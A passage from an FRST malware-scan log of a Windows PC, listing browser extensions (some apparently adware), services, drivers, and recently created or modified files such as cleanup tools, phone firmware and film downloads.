FF Plugin HKU\S-1-5-21-1443430433-3504582150-3450442512-1000: @tools.google.com/Google Update;version=9 -> C:\Users\VIJAY\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer Cloud)
FF Plugin ProgramFiles/Appdata: C:\Users\VIJAY\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\VIJAY\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\searchplugins\firefox-add-ons.xml
FF Extension: UnniDeals - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\d@WhEVH6.net [2015-02-10]
FF Extension: DownloadHelper - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-08-17]
FF Extension: Flash and Video Download - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2014-08-17]
FF Extension: Selenium IDE: C# Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\csharpformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Firebug - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\firebug@software.joehewitt.com.xpi [2014-06-25]
FF Extension: FirePath - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\FireXPath@pierre.tholence.com.xpi [2014-06-25]
FF Extension: Selenium IDE: Java Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\javaformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Compare Hatke - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\jid1-9ETkKdBARv7Iww@jetpack.xpi [2014-10-17]
FF Extension: Selenium IDE: Python Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\pythonformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: Selenium IDE: Ruby Formatters - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\rubyformatters@seleniumhq.org.xpi [2014-06-28]
FF Extension: CouponsHelper - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{239cc760-75a9-4276-b1fc-c0ceb963f373}.xpi [2014-09-03]
FF Extension: Selenium IDE - C:\Users\VIJAY\AppData\Roaming\Mozilla\Firefox\Profiles\agyg75sl.default\Extensions\{a6fd85ed-e919-4a43-a5af-8da18bda539f}.xpi [2014-06-28]

Chrome:
=======
CHR Profile: C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-10]
CHR Extension: (Google Docs) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-10]
CHR Extension: (Google Drive) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-10]
CHR Extension: (YouTube) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-10]
CHR Extension: (Google Search) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-02-10]
CHR Extension: (Google Sheets) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-10]
CHR Extension: (Google Wallet) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-10]
CHR Extension: (Gmail) - C:\Users\VIJAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-02-10]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ccEvtMgr; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [108456 2013-09-04] (Symantec Corporation)
R2 ccSetMgr; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [108456 2013-09-04] (Symantec Corporation)
S3 GameConsoleService; C:\Program Files\HP Games\HP Game Console\GameConsoleService.exe [250616 2009-05-22] (WildTangent, Inc.)
R2 HP Health Check Service; C:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [124928 2009-07-10] (Hewlett-Packard) [File not signed]
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [264704 2010-11-16] () [File not signed]
R2 Lavasoft Ad-Aware Service; C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe [921936 2009-01-19] (Lavasoft)
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [73728 2009-06-18] (Hewlett-Packard Company) [File not signed]
S3 LiveUpdate; C:\Program Files\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093944 2011-01-19] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [17536800 2014-07-25] (NVIDIA Corporation)
R2 RichVideo; C:\Program Files\CyberLink\Shared files\RichVideo.exe [247152 2009-01-22] ()
R2 SmcService; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [1893840 2013-09-04] (Symantec Corporation)
S4 SNAC; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [357792 2013-09-04] (Symantec Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_9691412ff1876250\STacSV.exe [229458 2010-03-23] (IDT, Inc.)
R2 Symantec AntiVirus; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [1839888 2013-09-04] (Symantec Corporation)
R2 TracSrvWrapper; C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe [4512952 2011-09-14] (Check Point Software Technologies)
R2 UI Assistant Service; C:\Program Files\Reliance 3G\AssistantServices.exe [275784 2012-11-26] ()
R2 VmbService; C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe [9216 2011-06-28] (Vodafone) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-11-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-11-26] (Symantec Corporation)
S3 massfilter; C:\Windows\System32\DRIVERS\massfilter.sys [9216 2011-08-29] (MBB Incorporated)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2015-02-10] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Definitions\VirusDefs\20150105.019\NAVENG.SYS [95704 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Definitions\VirusDefs\20150105.019\NAVEX15.SYS [1636696 2014-08-11] (Symantec Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19232 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad32v.sys [34080 2014-03-31] (NVIDIA Corporation)
R1 SPBBCDrv; C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys [421424 2013-09-04] (Symantec Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [287352 2013-09-04] (Symantec Corporation)
S3 SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [321016 2013-09-04] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [43768 2013-09-04] (Symantec Corporation)
S3 ssudobex; C:\Windows\System32\DRIVERS\ssudobex.sys [181912 2013-06-05] (DEVGURU Co., LTD.(www.devguru.co.kr))
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [125488 2014-06-15] (Symantec Corporation)
R3 SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [26416 2013-09-04] (Symantec Corporation)
R1 SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [188080 2013-09-04] (Symantec Corporation)
S4 SysPlant; C:\Windows\SYSTEM32\Drivers\SysPlant.sys [99744 2013-09-04] (Symantec Corporation)
R3 Teefer2; C:\Windows\System32\DRIVERS\teefer2.sys [67520 2013-09-04] (Symantec Corporation)
R3 vna_ap; C:\Windows\System32\DRIVERS\vnaap.sys [129304 2011-09-14] (Check Point Software Technologies)
R3 vodafone_K3805-z_dc_enum; C:\Windows\System32\DRIVERS\vodafone_K3805-z_dc_enum.sys [61952 2010-09-01] (Vodafone)
S3 vodafone_zte_cdc_acm; C:\Windows\System32\DRIVERS\vodafone_zte_cdc_acm.sys [67968 2011-05-20] (Vodafone)
S3 vodafone_zte_cdc_ecm; C:\Windows\System32\DRIVERS\vodafone_zte_cdc_ecm.sys [52224 2011-05-20] (Vodafone)
S3 vodafone_zte_cpo; C:\Windows\System32\DRIVERS\vodafone_zte_cpo.sys [9984 2011-05-20] (Vodafone)
S3 vodafone_zte_ecm_enum; C:\Windows\System32\DRIVERS\vodafone_zte_ecm_enum.sys [47488 2011-05-20] (Vodafone)
S3 vodafone_zte_ecm_enum_filter; C:\Windows\System32\DRIVERS\vodafone_zte_ecm_enum_filter.sys [47488 2011-05-20] (Vodafone)
R1 vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [455336 2011-09-12] (Check Point Software Technologies Ltd.)
S3 wirelessusbser; C:\Windows\System32\DRIVERS\3GDatausbser.sys [102656 2009-04-07] (QUALCOMM Incorporated)
R1 WPS; C:\Windows\system32\drivers\wpsdrvnt.sys [43936 2013-09-04] (Symantec Corporation)
R3 WpsHelper; C:\Windows\system32\drivers\WpsHelper.sys [174056 2012-09-30] (Symantec Corporation)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [102784 2015-02-08] (Huawei Technologies Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 12:04 - 2015-02-11 12:05 - 00023540 _____ () C:\Users\VIJAY\Desktop\FRST.txt
2015-02-11 11:46 - 2015-02-11 11:48 - 00000000 ____D () C:\AdwCleaner
2015-02-11 11:44 - 2015-02-11 11:44 - 02112512 _____ () C:\Users\VIJAY\Desktop\AdwCleaner.exe
2015-02-11 11:38 - 2015-02-11 11:38 - 00001238 _____ () C:\Users\VIJAY\Desktop\checkup.txt
2015-02-11 11:32 - 2015-02-11 11:32 - 00852594 _____ () C:\Users\VIJAY\Desktop\SecurityCheck.exe
2015-02-10 12:16 - 2015-02-10 12:17 - 00035879 _____ () C:\Users\VIJAY\Downloads\Addition.txt
2015-02-10 12:15 - 2015-02-10 12:17 - 00042241 _____ () C:\Users\VIJAY\Downloads\FRST.txt
2015-02-10 12:13 - 2015-02-11 12:05 - 00000000 ____D () C:\FRST
2015-02-10 12:13 - 2015-02-10 12:13 - 00000000 ____D () C:\Users\VIJAY\Downloads\FRST-OlderVersion
2015-02-10 12:12 - 2015-02-10 12:13 - 01124352 _____ (Farbar) C:\Users\VIJAY\Desktop\FRST.exe
2015-02-10 12:12 - 2015-02-10 12:12 - 00002889 _____ () C:\Users\VIJAY\Desktop\aswMBR.txt
2015-02-10 12:12 - 2015-02-10 12:12 - 00000512 _____ () C:\Users\VIJAY\Desktop\MBR.dat
2015-02-10 11:41 - 2015-02-10 11:41 - 00158024 _____ () C:\Windows\Minidump\021015-24882-01.dmp
2015-02-10 11:37 - 2015-02-10 11:37 - 05198336 _____ (AVAST Software) C:\Users\VIJAY\Downloads\aswMBR.exe
2015-02-10 11:25 - 2015-02-10 11:25 - 00000628 _____ () C:\Windows\system32\.crusader
2015-02-10 11:17 - 2015-02-10 11:26 - 00000000 ____D () C:\ProgramData\HitmanPro
2015-02-10 11:14 - 2015-02-10 11:16 - 10285456 _____ (SurfRight B.V.) C:\Users\VIJAY\Downloads\HitmanPro.exe
2015-02-10 03:32 - 2015-02-10 03:52 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-02-10 03:32 - 2015-02-10 03:32 - 00001064 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-02-10 03:32 - 2015-02-10 03:32 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-02-10 03:32 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-02-10 03:32 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-02-10 03:32 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-02-10 03:30 - 2015-02-10 03:32 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\VIJAY\Downloads\mbam-setup-2.0.4.1028.exe
2015-02-10 03:10 - 2015-02-10 03:10 - 00000000 ____D () C:\Users\VIJAY\Desktop\PUP.Optional.Elex Removal Instructions_files
2015-02-10 02:48 - 2015-02-11 11:57 - 00001176 _____ () C:\Windows\setupact.log
2015-02-10 02:48 - 2015-02-10 10:47 - 00002722 _____ () C:\Windows\PFRO.log
2015-02-10 02:48 - 2015-02-10 02:48 - 00000000 _____ () C:\Windows\setuperr.log
2015-02-10 02:47 - 2015-02-10 02:48 - 00000472 _____ () C:\Windows\Tasks\Ad-Aware Update (Weekly).job
2015-02-10 02:46 - 2015-02-10 02:47 - 00000000 ____D () C:\ProgramData\Lavasoft
2015-02-10 02:46 - 2015-02-10 02:46 - 00001100 _____ () C:\Users\Public\Desktop\Ad-Aware.lnk
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 __HDC () C:\ProgramData\{83C91755-2546-441D-AC40-9A6B4B860800}
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2015-02-10 02:46 - 2015-02-10 02:46 - 00000000 ____D () C:\Program Files\Lavasoft
2015-02-10 02:26 - 2015-02-10 02:26 - 00000969 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-02-10 02:26 - 2015-02-10 02:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2015-02-10 02:26 - 2015-02-10 02:26 - 00000000 ____D () C:\Program Files\CCleaner
2015-02-10 02:21 - 2015-02-10 02:21 - 00002330 _____ () C:\Users\VIJAY\Desktop\Google Chrome.lnk
2015-02-10 02:21 - 2015-02-10 02:21 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-02-10 02:18 - 2015-02-10 02:18 - 00001121 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-02-10 02:18 - 2015-02-10 02:18 - 00001109 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-02-10 02:18 - 2015-02-10 02:18 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2015-02-10 01:52 - 2015-02-10 01:52 - 00000000 ____D () C:\ProgramData\{2b348a2e-19fb-a825-2b34-48a2e19f28b8}
2015-02-10 01:10 - 2015-02-10 01:10 - 00000000 ____D () C:\ProgramData\hoifinhnlbhamdnldibkogbgiiefbnfh
2015-02-10 01:10 - 2015-02-10 01:10 - 00000000 ____D () C:\Program Files\UnniDeals
2015-02-10 01:08 - 2015-02-10 01:08 - 01100288 _____ () C:\Users\VIJAY\Downloads\S5830i_Modem_Files.zip.exe
2015-02-10 01:03 - 2015-02-10 01:03 - 00000000 ____D () C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones
2015-02-10 01:02 - 2015-02-10 01:03 - 26551126 _____ () C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones.zip
2015-02-10 01:01 - 2015-02-10 01:02 - 00000000 ____D () C:\Users\VIJAY\Downloads\XXLK3
2015-02-10 00:53 - 2015-02-10 00:59 - 132400608 _____ () C:\Users\VIJAY\Downloads\XXLK3.zip
2015-02-08 20:32 - 2015-02-08 20:31 - 01112288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2015-02-08 20:32 - 2015-02-08 20:31 - 00861696 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00353280 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00193792 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00181760 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00102784 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00073216 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00064384 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00026624 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00025856 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00019200 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2015-02-08 20:32 - 2015-02-08 20:31 - 00011136 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2015-02-08 20:31 - 2015-02-08 20:33 - 00000000 ____D () C:\ProgramData\DatacardService
2015-02-08 12:15 - 2015-02-08 12:15 - 00000045 _____ () C:\Users\VIJAY\Desktop\olx.txt
2015-02-08 11:50 - 2015-02-08 11:51 - 00000000 ____D () C:\Users\VIJAY\Downloads\S5830i_XXLI1_ODDLI1_DDLI1_by_SplitFUS2
2015-02-08 11:32 - 2015-02-08 11:50 - 131844954 _____ () C:\Users\VIJAY\Downloads\S5830i_XXLI1_ODDLI1_DDLI1_by_SplitFUS2.zip
2015-02-08 11:31 - 2015-02-08 11:31 - 00203676 _____ () C:\Users\VIJAY\Downloads\Odin3-v1.85.zip
2015-02-08 11:31 - 2015-02-08 11:31 - 00000000 ____D () C:\Users\VIJAY\Downloads\Odin3-v1.85
2015-02-08 02:09 - 2015-02-08 02:10 - 00000000 ____D () C:\Users\VIJAY\Downloads\Barfi! 2012 Hindi 720p DvDRip CharmeLeon Silver RG
2015-02-07 15:27 - 2015-02-07 11:11 - 00677285 _____ () C:\Users\VIJAY\Downloads\Samsung 300K Tool.exe
2015-02-06 23:27 - 2015-02-07 21:24 - 00000322 _____ () C:\Windows\Tasks\HPCeeScheduleForVIJAY.job
2015-02-06 03:12 - 2015-02-06 03:12 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01007.Wdf
2015-02-06 02:57 - 2013-06-05 10:48 - 00181912 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudobex.sys
2015-02-06 02:55 - 2015-02-06 02:55 - 00000000 ____D () C:\Program Files\SAMSUNG
2015-02-06 02:53 - 2015-02-06 02:53 - 00000000 ____D () C:\ProgramData\Samsung
2015-02-06 02:51 - 2015-02-06 02:52 - 15364480 _____ (SAMSUNG Electronics Co., Ltd.) C:\Users\VIJAY\Downloads\SAMSUNG_USB_Driver_for_Mobile_Phones_v1.5.25.0-retail.exe
2015-02-06 02:48 - 2015-02-06 02:48 - 00000000 ____D () C:\Users\VIJAY\Downloads\ODIN_4.38_+_Tass.ops
2015-02-06 02:47 - 2015-02-06 02:47 - 00178811 _____ () C:\Users\VIJAY\Downloads\ODIN_4.38_+_Tass.ops.rar
2015-02-06 02:42 - 2015-02-06 02:42 - 00000000 ____D () C:\Users\VIJAY\Downloads\S5830DDKQ8_S5830ODDKQ7_INS
2015-02-06 02:32 - 2015-02-06 02:39 - 142392990 _____ () C:\Users\VIJAY\Downloads\S5830DDKQ8_S5830ODDKQ7_INS.zip
2015-01-31 10:46 - 2015-01-31 10:46 - 00002166 _____ () C:\Users\Public\Desktop\Vodafone Mobile Broadband.lnk
2015-01-31 10:46 - 2015-01-31 10:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vodafone
2015-01-31 10:46 - 2015-01-31 10:46 - 00000000 ____D () C:\Program Files\Vodafone
2015-01-31 10:45 - 2015-01-31 10:45 - 00000000 ____D () C:\Users\VIJAY\AppData\Local\{B9614B49-C7A3-4D75-A779-03E5B77C119F}
2015-01-30 01:34 - 2015-01-30 02:47 - 1016243528 ____R () C:\Users\VIJAY\Downloads\HN3Y.WD72E5.W0rldFree4u.C0m.mkv
2015-01-24 00:11 - 2015-01-24 00:55 - 00000000 ____D () C:\Users\VIJAY\Downloads\Zid 2014 Hindi HDRip 720p x264 AAC...Hon3y
2015-01-24 00:07 - 2015-01-24 03:20 - 00000000 ____D () C:\Users\VIJAY\Downloads\Borat 2006 720p BRRip x264 MP4 AAC-CC
2015-01-24 00:04 - 2015-01-24 00:05 - 00000000 ____D () C:\Users\VIJAY\Downloads\Gone Girl (2014) 480p 2ch BRRip AAC x264 - [GeekRG]
2015-01-23 23:58 - 2015-01-24 02:44 - 00000000 ____D () C:\Users\VIJAY\Downloads\Kill Dil 2014 720p BluRay x264 Hindi AAC - Ozlem
2015-01-23 23:55 - 2015-01-24 00:00 - 00000000 ____D () C:\Users\VIJAY\Downloads\Baby (2015) [1CD] DVDSCR Audio Cleaned Rip Xvid Mp3 M2TV Exclusive
2015-01-18 20:38 - 2015-01-18 20:38 - 00000046 _____ () C:\Users\VIJAY\Desktop\phones.txt
2015-01-14 00:51 - 2014-12-12 10:41 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-14 00:51 - 2014-12-12 10:41 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-14 00:51 - 2014-12-11 23:17 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-14 00:50 - 2014-12-19 08:13 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-14 00:50 - 2014-12-19 07:04 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 00:50 - 2014-12-06 09:20 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-11 12:04 - 2009-07-14 10:04 - 00024192 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-02-11 12:04 - 2009-07-14 10:04 - 00024192 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-02-11 12:01 - 2014-06-19 00:20 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-02-11 12:01 - 2014-06-15 14:54 - 01467268 _____ () C:\Windows\WindowsUpdate.log
2015-02-11 11:58 - 2014-06-15 15:04 - 00000753 _____ () C:\ProgramData\hpqp.ini
2015-02-11 11:57 - 2009-07-14 10:23 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-02-11 11:31 - 2014-08-09 19:40 - 00000856 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000Core.job
2015-02-11 11:19 - 2014-08-09 19:40 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1443430433-3504582150-3450442512-1000UA.job
2015-02-10 11:41 - 2014-07-06 20:32 - 00000000 ____D () C:\Windows\Minidump
2015-02-10 03:16 - 2014-06-15 03:06 - 00001146 _____ () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-02-10 02:48 - 2009-07-14 10:23 - 00032620 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-02-10 02:28 - 2014-06-23 23:12 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\uTorrent
2015-02-10 02:28 - 2009-07-24 22:30 - 00000000 ____D () C:\Windows\Panther
2015-02-10 02:18 - 2014-12-26 11:23 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2015-02-10 02:18 - 2014-06-16 08:12 - 00000000 ____D () C:\Program Files\Google
2015-02-09 08:39 - 2009-07-24 21:41 - 00785302 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-02-08 20:31 - 2014-06-15 03:10 - 00000000 ____D () C:\Program Files\TATA Photon+
2015-02-08 20:31 - 2013-04-09 13:10 - 01112288 _____ (Microsoft Corporation) C:\Windows\system32\wdfcoinstaller01007.dll
2015-02-08 14:08 - 2014-06-15 17:21 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\vlc
2015-02-07 19:13 - 2014-06-15 12:39 - 00002332 ____H () C:\Users\VIJAY\Documents\Default.rdp
2015-02-06 23:39 - 2014-06-15 03:01 - 00000000 ____D () C:\Users\VIJAY
2015-02-06 23:10 - 2014-06-28 09:15 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2015-02-06 09:01 - 2014-06-19 00:20 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-02-06 09:01 - 2014-06-19 00:20 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-02-03 10:43 - 2014-06-15 12:35 - 00001660 _____ () C:\Windows\system32\Drivers\DisconnectedPolicy.xml
2015-02-01 16:02 - 2014-06-15 03:24 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\Mozilla
2015-01-31 10:39 - 2014-06-21 14:04 - 00000000 ____D () C:\ProgramData\Vodafone
2015-01-31 10:28 - 2009-07-14 08:07 - 00000000 ____D () C:\Windows\system32\NDF
2015-01-26 22:50 - 2014-06-15 12:01 - 00000000 ____D () C:\Users\VIJAY\Downloads\movies
2015-01-24 03:06 - 2014-07-31 10:53 - 00000000 ____D () C:\Users\VIJAY\dwhelper
2015-01-23 23:58 - 2014-06-23 23:13 - 00000813 _____ () C:\Users\VIJAY\Desktop\µTorrent.lnk
2015-01-23 23:58 - 2014-06-23 23:13 - 00000793 _____ () C:\Users\VIJAY\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2015-01-23 23:57 - 2014-06-15 03:11 - 00000000 ____D () C:\Users\VIJAY\AppData\Roaming\HpUpdate
2015-01-18 20:10 - 2015-01-10 23:17 - 00000016 _____ () C:\Users\VIJAY\Desktop\movie to be watched.txt
2015-01-14 02:29 - 2014-06-16 09:17 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-14 02:23 - 2014-06-16 09:17 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2014-06-15 03:06 - 2014-06-15 03:06 - 0000000 _____ () C:\Users\VIJAY\AppData\Local\AtStart.txt
